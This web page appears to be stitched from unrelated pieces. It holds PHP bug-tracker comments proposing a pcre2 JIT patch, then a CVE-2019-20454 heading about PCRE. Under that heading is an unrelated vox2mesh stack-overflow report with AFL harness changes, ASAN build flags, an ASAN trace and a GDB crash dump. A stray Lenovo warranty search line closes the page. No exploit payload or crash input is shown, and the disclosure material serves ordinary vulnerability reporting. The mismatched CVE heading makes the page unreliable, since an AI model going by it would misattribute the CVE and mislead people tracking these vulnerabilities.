 **\[2019-07-29 17:17 UTC\] cmb@php.net**

This issue has already been fixed upstream.  Since it is caused by
erroneous treatment of the subject (which may be user supplied),
we should consider to apply the following patch to our bundled
pcre2 (PHP-7.3+):

 ext/pcre/pcre2lib/pcre2\_jit\_compile.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ext/pcre/pcre2lib/pcre2\_jit\_compile.c b/ext/pcre/pcre2lib/pcre2\_jit\_compile.c
index 1f21bfb6ad..283aeff83c 100644
--- a/ext/pcre/pcre2lib/pcre2\_jit\_compile.c
+++ b/ext/pcre/pcre2lib/pcre2\_jit\_compile.c
@@ -8538,7 +8538,7 @@ int lgb, rgb, ricount;
 PCRE2\_SPTR bptr;
 uint32\_t c;
 
-GETCHARINC(c, cc);
+c = \*cc++;
 #if PCRE2\_CODE\_UNIT\_WIDTH == 32
 if (c >= 0x110000)
   return NULL;

 **\[2019-07-29 22:01 UTC\] stas@php.net**

\-Status: Analyzed +Status: Closed

 **\[2019-07-29 22:01 UTC\] stas@php.net**

The fix for this bug has been committed.
If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test.
Thank you for the report, and for helping us make PHP better.

 **\[2019-07-29 22:01 UTC\] stas@php.net**

\-PHP Version: 7.4Git-2019-07-28 (Git) +PHP Version: 7.3.8

CVE-2019-20454: Array cross-border reading/global variable coverage in PCRE

vox2mesh 1.0 has stack-overflow in main.cpp, this is stack-overflow caused by incorrect use of memcpy() funciton. The flow allows an attacker to cause a denial of service (abort) via a crafted file.

**vox2mesh\_poc**

Project address

afl\_vox2obj

asan\_vox2obj

id00

**Vulnerability information**

vox2mesh project has stack-overflow in main.cpp, this is stack-overflow caused by incorrect use of memcpy() funciton. The flow allows an attacker to cause a denial of service (abort) via a crafted file.

**OS information**

ubuntu@ubuntu:~/Desktop/vox2mesh/build/vox2obj$ uname -a
Linux ubuntu 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023 x86\_64 x86\_64 x86\_64 GNU/Linux

**Usages original project**

    vox2obj input.vox output.obj
    

**Build instructions**

    mkdir build; cd build;
    cmake ../
    make
    

**Build afl harness**

1.  change main() function in main.cpp

int main(int argc, char\*\* argv)
{

    Options options;
    int optionIndex = parseArgument(options, argc, argv);
    int numArgs = argc - optionIndex;

    options.inputFile = argv\[optionIndex\];
    options.outputFile = "output.obj";

    VoxReader reader;
    if (!reader.readFile(options.inputFile)) {
        printf("error reading voxels\\n");
        return 1;
    }

2.  change CMakelist.txt, add code:

set (CMAKE\_C\_COMPILER "/usr/local/bin/afl-clang-fast")
set (CMAKE\_CXX\_COMPILER "/usr/local/bin/afl-clang-fast++")

**Harness Usages****Build ASAN**

change CMakelist.txt, add code:

set(CMAKE\_CXX\_FLAGS "\-fsanitize=address -O1 -fno-omit-frame-pointer")
set(CMAKE\_C\_FLAGS "\-Wall -Werror -Wstrict-prototypes -Wmissing-prototypes")

**ASAN**

ubuntu@ubuntu:~/Desktop/vox2mesh/build/vox2obj$ ./vox2obj out/default/crashes/id\\:000000\\,sig\\:11\\,src\\:000002\\,time\\:9972\\,execs\\:836\\,op\\:havoc\\,rep\\:4 
Version: 150
ChunkId: MAIN
399 voxels
AddressSanitizer:DEADLYSIGNAL
=================================================================
==38193==ERROR: AddressSanitizer: stack-overflow on address 0x7ffff6f8ccf8 (pc 0x0000004db3b1 bp 0x7fffffffd990 sp 0x7ffff6f8cd00 T0)
    #0 0x4db3b1 in VoxReader::readChunk(unsigned char const\*, unsigned int) /home/ubuntu/Desktop/vox2mesh/VoxReader.cpp:138:13
    #1 0x4db541 in VoxReader::readChunk(unsigned char const\*, unsigned int) /home/ubuntu/Desktop/vox2mesh/VoxReader.cpp:152:13
    #2 0x4dbb4c in VoxReader::loadVoxelsData(unsigned char const\*, unsigned long) /home/ubuntu/Desktop/vox2mesh/VoxReader.cpp:205:9
    #3 0x4cf517 in VoxReader::readFile(std::\_\_cxx11::basic\_string<char, std::char\_traits<char>, std::allocator<char> > const&) /home/ubuntu/Desktop/vox2mesh/VoxReader.cpp:186:12
    #4 0x4e66cb in main /home/ubuntu/Desktop/vox2mesh/main.cpp:59:17
    #5 0x7ffff7a5b082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #6 0x4204fd in \_start (/home/ubuntu/Desktop/vox2mesh/build/vox2obj/vox2obj+0x4204fd)

SUMMARY: AddressSanitizer: stack-overflow /home/ubuntu/Desktop/vox2mesh/VoxReader.cpp:138:13 in VoxReader::readChunk(unsigned char const\*, unsigned int)

**GDB**

ubuntu@ubuntu:~/Desktop/vox2mesh/build/vox2obj$ gdb --args ./afl\_vox2obj out/default/crashes/id\\:000000\\,sig\\:11\\,src\\:000002\\,time\\:9972\\,execs\\:836\\,op\\:havoc\\,rep\\:4 
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html\>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86\_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/\>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/\>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./afl\_vox2obj...
gdb-peda$ r 
Starting program: /home/ubuntu/Desktop/vox2mesh/build/vox2obj/afl\_vox2obj out/default/crashes/id:000000,sig:11,src:000002,time:9972,execs:836,op:havoc,rep:4
Version: 150
ChunkId: MAIN
399 voxels

Program received signal SIGSEGV, Segmentation fault.
\[----------------------------------registers-----------------------------------\]
RAX: 0x9070b10 
RBX: 0x9070b0b 
RCX: 0x421ca0 --\> 0x10001000000 
RDX: 0x9070b0b 
RSI: 0x635784 --\> 0x6510000000b 
RDI: 0x7ffff6f8d0e0 
RBP: 0x7fffffffdc60 --\> 0x7fffffffdce0 --\> 0x1 
RSP: 0x7ffff6f8d0e0 
RIP: 0x40ae33 (<VoxReader::readChunk(unsigned char const\*, unsigned int)+163>:	call   0x4051c0 <memcpy@plt\>)
R8 : 0x634b38 --\> 0x8070734 
R9 : 0x18f 
R10: 0xfffffffffffff04a 
R11: 0x7ffff7b066d0 (<\_\_GI\_\_\_libc\_free\>:	endbr64)
R12: 0x4203b8 --\> 0x421ca0 --\> 0x10001000000 
R13: 0x9 ('\\t')
R14: 0x7fffffffdda0 --\> 0x1400000014 
R15: 0x7ffff6f8d0e0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
\[-------------------------------------code-------------------------------------\]
   0x40ae2a <VoxReader::readChunk(unsigned char const\*, unsigned int)+154>:	mov    r14,rdi
   0x40ae2d <VoxReader::readChunk(unsigned char const\*, unsigned int)+157>:	mov    rdi,r15
   0x40ae30 <VoxReader::readChunk(unsigned char const\*, unsigned int)+160>:	mov    rbx,rdx
=\> 0x40ae33 <VoxReader::readChunk(unsigned char const\*, unsigned int)+163>:	call   0x4051c0 <memcpy@plt\>
   0x40ae38 <VoxReader::readChunk(unsigned char const\*, unsigned int)+168>:	lea    rsi,\[rbp-0x60\]
   0x40ae3c <VoxReader::readChunk(unsigned char const\*, unsigned int)+172>:	mov    rdi,r14
   0x40ae3f <VoxReader::readChunk(unsigned char const\*, unsigned int)+175>:	mov    r14,QWORD PTR \[rbp-0x38\]
   0x40ae43 <VoxReader::readChunk(unsigned char const\*, unsigned int)+179>:	mov    rdx,r15
Guessed arguments:
arg\[0\]: 0x7ffff6f8d0e0 
arg\[1\]: 0x635784 --\> 0x6510000000b 
\[------------------------------------stack-------------------------------------\]
Invalid $SP address: 0x7ffff6f8d0e0
\[------------------------------------------------------------------------------\]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040ae33 in VoxReader::readChunk (this=0x7fffffffdda0, bytes=bytes@entry=0x635778 "\\v\\b\\a\\t\\v\\v\\a\\t\\v\\t\\a\\t\\v", size=size@entry=0x9) at /home/ubuntu/Desktop/vox2mesh/VoxReader.cpp:139
139	            memcpy(&chunkContent, bytes + 12, chunkContentSize);

In original code 139, you can see this is stack overflow caused by incorrect use of memcpy() funciton, SP pointer can't point correct address.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us